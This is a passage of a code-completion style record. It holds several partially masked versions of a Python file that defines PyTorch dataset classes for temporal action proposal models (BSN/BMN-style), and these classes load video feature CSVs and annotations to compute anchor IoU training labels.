"step-1": "<mask token>\n\n\nclass VideoDataSet(data.Dataset):\n <mask token>\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass ProposalDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.subset = subset\n self.mode = opt['mode']\n if self.mode == 'train':\n self.top_K = opt['pem_top_K']\n else:\n self.top_K = opt['pem_top_K_inference']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self.feature_path = opt['feature_path']\n self.temporal_scale = opt['temporal_scale']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __len__(self):\n return len(self.video_list)\n\n def __getitem__(self, index):\n video_name = self.video_list[index]\n pdf = pandas.read_csv('./output/PGM_proposals/' + video_name + '.csv')\n pdf = pdf[:self.top_K]\n video_feature = numpy.load('./output/PGM_feature/' + video_name +\n '.npy')\n video_feature = video_feature[:self.top_K, :]\n video_feature = torch.Tensor(video_feature)\n if self.mode == 'train':\n video_match_iou = torch.Tensor(pdf.match_iou.values[:])\n return video_feature, video_match_iou\n else:\n video_xmin = pdf.xmin.values[:]\n video_xmax = pdf.xmax.values[:]\n video_xmin_score = pdf.xmin_score.values[:]\n video_xmax_score = pdf.xmax_score.values[:]\n return (video_feature, video_xmin, video_xmax, video_xmin_score,\n video_xmax_score)\n\n\n<mask token>\n\n\nclass BMN_VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n self._get_match_map()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __getitem__(self, index):\n video_data = self._load_file(index)\n if self.mode == 'train':\n match_score_start, match_score_end, confidence_score = (self.\n _get_train_label(index, self.anchor_xmin, self.anchor_xmax))\n return (video_data, confidence_score, match_score_start,\n match_score_end)\n else:\n return index, video_data\n\n def _get_match_map(self):\n match_map = []\n for idx in range(self.temporal_scale):\n tmp_match_window = []\n xmin = self.temporal_gap * idx\n for jdx in range(1, self.temporal_scale + 1):\n xmax = xmin + self.temporal_gap * jdx\n tmp_match_window.append([xmin, xmax])\n match_map.append(tmp_match_window)\n match_map = np.array(match_map)\n match_map = np.transpose(match_map, [1, 0, 2])\n match_map = np.reshape(match_map, [-1, 2])\n self.match_map = match_map\n self.anchor_xmin = [(self.temporal_gap * (i - 0.5)) for i in range(\n self.temporal_scale)]\n self.anchor_xmax = [(self.temporal_gap * (i + 0.5)) for i in range(\n 1, self.temporal_scale + 1)]\n\n def _load_file(self, index):\n video_name = self.video_list[index]\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(self.\n temporal_scale) + '/' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n gt_iou_map = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n tmp_gt_iou_map = iou_with_anchors(self.match_map[:, 0], self.\n match_map[:, 1], tmp_start, tmp_end)\n tmp_gt_iou_map = np.reshape(tmp_gt_iou_map, [self.\n temporal_scale, self.temporal_scale])\n gt_iou_map.append(tmp_gt_iou_map)\n gt_iou_map = np.array(gt_iou_map)\n gt_iou_map = np.max(gt_iou_map, axis=0)\n gt_iou_map = torch.Tensor(gt_iou_map)\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = 3 * self.temporal_gap\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), axis=1)\n match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(ioa_with_anchors(anchor_xmin[\n jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(ioa_with_anchors(anchor_xmin[jdx],\n anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_start, match_score_end, gt_iou_map\n\n def __len__(self):\n return len(self.video_list)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.boundary_ratio = opt['boundary_ratio']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('Before check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n <mask token>\n\n def _get_base_data(self, index):\n video_name = self.video_list[index]\n anchor_xmin = [(self.temporal_gap * i) for i in range(self.\n temporal_scale)]\n anchor_xmax = [(self.temporal_gap * i) for i in range(1, self.\n temporal_scale + 1)]\n try:\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video_name + '.csv')\n except:\n print('Error in ' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data, anchor_xmin, anchor_xmax\n <mask token>\n <mask token>\n <mask token>\n\n def __len__(self):\n return len(self.video_list)\n\n\nclass ProposalDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.subset = subset\n self.mode = opt['mode']\n if self.mode == 'train':\n self.top_K = opt['pem_top_K']\n else:\n self.top_K = opt['pem_top_K_inference']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self.feature_path = opt['feature_path']\n self.temporal_scale = opt['temporal_scale']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __len__(self):\n return len(self.video_list)\n\n def __getitem__(self, index):\n video_name = self.video_list[index]\n pdf = pandas.read_csv('./output/PGM_proposals/' + video_name + '.csv')\n pdf = pdf[:self.top_K]\n video_feature = numpy.load('./output/PGM_feature/' + video_name +\n '.npy')\n video_feature = video_feature[:self.top_K, :]\n video_feature = torch.Tensor(video_feature)\n if self.mode == 'train':\n video_match_iou = torch.Tensor(pdf.match_iou.values[:])\n return video_feature, video_match_iou\n else:\n video_xmin = pdf.xmin.values[:]\n video_xmax = pdf.xmax.values[:]\n video_xmin_score = pdf.xmin_score.values[:]\n video_xmax_score = pdf.xmax_score.values[:]\n return (video_feature, video_xmin, video_xmax, video_xmin_score,\n video_xmax_score)\n\n\n<mask token>\n\n\nclass BMN_VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n self._get_match_map()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __getitem__(self, index):\n video_data = self._load_file(index)\n if self.mode == 'train':\n match_score_start, match_score_end, confidence_score = (self.\n _get_train_label(index, self.anchor_xmin, self.anchor_xmax))\n return (video_data, confidence_score, match_score_start,\n match_score_end)\n else:\n return index, video_data\n\n def _get_match_map(self):\n match_map = []\n for idx in range(self.temporal_scale):\n tmp_match_window = []\n xmin = self.temporal_gap * idx\n for jdx in range(1, self.temporal_scale + 1):\n xmax = xmin + self.temporal_gap * jdx\n tmp_match_window.append([xmin, xmax])\n match_map.append(tmp_match_window)\n match_map = np.array(match_map)\n match_map = np.transpose(match_map, [1, 0, 2])\n match_map = np.reshape(match_map, [-1, 2])\n self.match_map = match_map\n self.anchor_xmin = [(self.temporal_gap * (i - 0.5)) for i in range(\n self.temporal_scale)]\n self.anchor_xmax = [(self.temporal_gap * (i + 0.5)) for i in range(\n 1, self.temporal_scale + 1)]\n\n def _load_file(self, index):\n video_name = self.video_list[index]\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(self.\n temporal_scale) + '/' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n gt_iou_map = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n tmp_gt_iou_map = iou_with_anchors(self.match_map[:, 0], self.\n match_map[:, 1], tmp_start, tmp_end)\n tmp_gt_iou_map = np.reshape(tmp_gt_iou_map, [self.\n temporal_scale, self.temporal_scale])\n gt_iou_map.append(tmp_gt_iou_map)\n gt_iou_map = np.array(gt_iou_map)\n gt_iou_map = np.max(gt_iou_map, axis=0)\n gt_iou_map = torch.Tensor(gt_iou_map)\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = 3 * self.temporal_gap\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), axis=1)\n match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(ioa_with_anchors(anchor_xmin[\n jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(ioa_with_anchors(anchor_xmin[jdx],\n anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_start, match_score_end, gt_iou_map\n\n def __len__(self):\n return len(self.video_list)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef load_json(file):\n with open(file) as json_file:\n data = json.load(json_file)\n return data\n\n\nclass VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.boundary_ratio = opt['boundary_ratio']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('Before check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def __getitem__(self, index):\n video_data, anchor_xmin, anchor_xmax = self._get_base_data(index)\n if self.mode == 'train':\n match_score_action, match_score_start, match_score_end = (self.\n _get_train_label(index, anchor_xmin, anchor_xmax))\n return (video_data, match_score_action, match_score_start,\n match_score_end)\n else:\n return index, video_data, anchor_xmin, anchor_xmax\n\n def _get_base_data(self, index):\n video_name = self.video_list[index]\n anchor_xmin = [(self.temporal_gap * i) for i in range(self.\n temporal_scale)]\n anchor_xmax = [(self.temporal_gap * i) for i in range(1, self.\n temporal_scale + 1)]\n try:\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video_name + '.csv')\n except:\n print('Error in ' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data, anchor_xmin, anchor_xmax\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = np.maximum(self.temporal_gap, self.boundary_ratio *\n gt_lens)\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), axis=1)\n match_score_action = []\n for jdx in range(len(anchor_xmin)):\n match_score_action.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_xmins, gt_xmaxs)))\n match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_end_bboxs[:, 0],\n gt_end_bboxs[:, 1])))\n match_score_action = torch.Tensor(match_score_action)\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_action, match_score_start, match_score_end\n\n def _ioa_with_anchors(self, anchors_min, anchors_max, box_min, box_max):\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.0)\n scores = np.divide(inter_len, len_anchors)\n return scores\n\n def _ioa(self, anchors, gts):\n len_anchors = anchors[:, 1] - anchors[:, 0]\n int_min = np.maximum(anchors[:, 0], gts[:, 0])\n int_max = np.minimum(anchors[:, 1], gts[:, 1])\n np.maximum(np.expand_dims(np.arange(1, 5), 1), np.arange(3))\n\n def __len__(self):\n return len(self.video_list)\n\n\nclass ProposalDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.subset = subset\n self.mode = opt['mode']\n if self.mode == 'train':\n self.top_K = opt['pem_top_K']\n else:\n self.top_K = opt['pem_top_K_inference']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self.feature_path = opt['feature_path']\n self.temporal_scale = opt['temporal_scale']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __len__(self):\n return len(self.video_list)\n\n def __getitem__(self, index):\n video_name = self.video_list[index]\n pdf = pandas.read_csv('./output/PGM_proposals/' + video_name + '.csv')\n pdf = pdf[:self.top_K]\n video_feature = numpy.load('./output/PGM_feature/' + video_name +\n '.npy')\n video_feature = video_feature[:self.top_K, :]\n video_feature = torch.Tensor(video_feature)\n if self.mode == 'train':\n video_match_iou = torch.Tensor(pdf.match_iou.values[:])\n return video_feature, video_match_iou\n else:\n video_xmin = pdf.xmin.values[:]\n video_xmax = pdf.xmax.values[:]\n video_xmin_score = pdf.xmin_score.values[:]\n video_xmax_score = pdf.xmax_score.values[:]\n return (video_feature, video_xmin, video_xmax, video_xmin_score,\n video_xmax_score)\n\n\ndef load_json(file):\n with open(file) as json_file:\n json_data = json.load(json_file)\n return json_data\n\n\nclass BMN_VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n self._get_match_map()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __getitem__(self, index):\n video_data = self._load_file(index)\n if self.mode == 'train':\n match_score_start, match_score_end, confidence_score = (self.\n _get_train_label(index, self.anchor_xmin, self.anchor_xmax))\n return (video_data, confidence_score, match_score_start,\n match_score_end)\n else:\n return index, video_data\n\n def _get_match_map(self):\n match_map = []\n for idx in range(self.temporal_scale):\n tmp_match_window = []\n xmin = self.temporal_gap * idx\n for jdx in range(1, self.temporal_scale + 1):\n xmax = xmin + self.temporal_gap * jdx\n tmp_match_window.append([xmin, xmax])\n match_map.append(tmp_match_window)\n match_map = np.array(match_map)\n match_map = np.transpose(match_map, [1, 0, 2])\n match_map = np.reshape(match_map, [-1, 2])\n self.match_map = match_map\n self.anchor_xmin = [(self.temporal_gap * (i - 0.5)) for i in range(\n self.temporal_scale)]\n self.anchor_xmax = [(self.temporal_gap * (i + 0.5)) for i in range(\n 1, self.temporal_scale + 1)]\n\n def _load_file(self, index):\n video_name = self.video_list[index]\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(self.\n temporal_scale) + '/' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n gt_iou_map = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n tmp_gt_iou_map = iou_with_anchors(self.match_map[:, 0], self.\n match_map[:, 1], tmp_start, tmp_end)\n tmp_gt_iou_map = np.reshape(tmp_gt_iou_map, [self.\n temporal_scale, self.temporal_scale])\n gt_iou_map.append(tmp_gt_iou_map)\n gt_iou_map = np.array(gt_iou_map)\n gt_iou_map = np.max(gt_iou_map, axis=0)\n gt_iou_map = torch.Tensor(gt_iou_map)\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = 3 * self.temporal_gap\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), axis=1)\n match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(ioa_with_anchors(anchor_xmin[\n jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(ioa_with_anchors(anchor_xmin[jdx],\n anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_start, match_score_end, gt_iou_map\n\n def __len__(self):\n return len(self.video_list)\n\n\n<mask token>\n\n\ndef iou_with_anchors(anchors_min, anchors_max, box_min, box_max):\n \"\"\"Compute jaccard score between a box and the anchors.\n \"\"\"\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.0)\n union_len = len_anchors - inter_len + box_max - box_min\n jaccard = np.divide(inter_len, union_len)\n return jaccard\n\n\n<mask token>\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport pandas\nimport numpy\nimport json\nimport torch.utils.data as data\nimport os\nimport torch\n\n\ndef load_json(file):\n with open(file) as json_file:\n data = json.load(json_file)\n return data\n\n\nclass VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.boundary_ratio = opt['boundary_ratio']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = 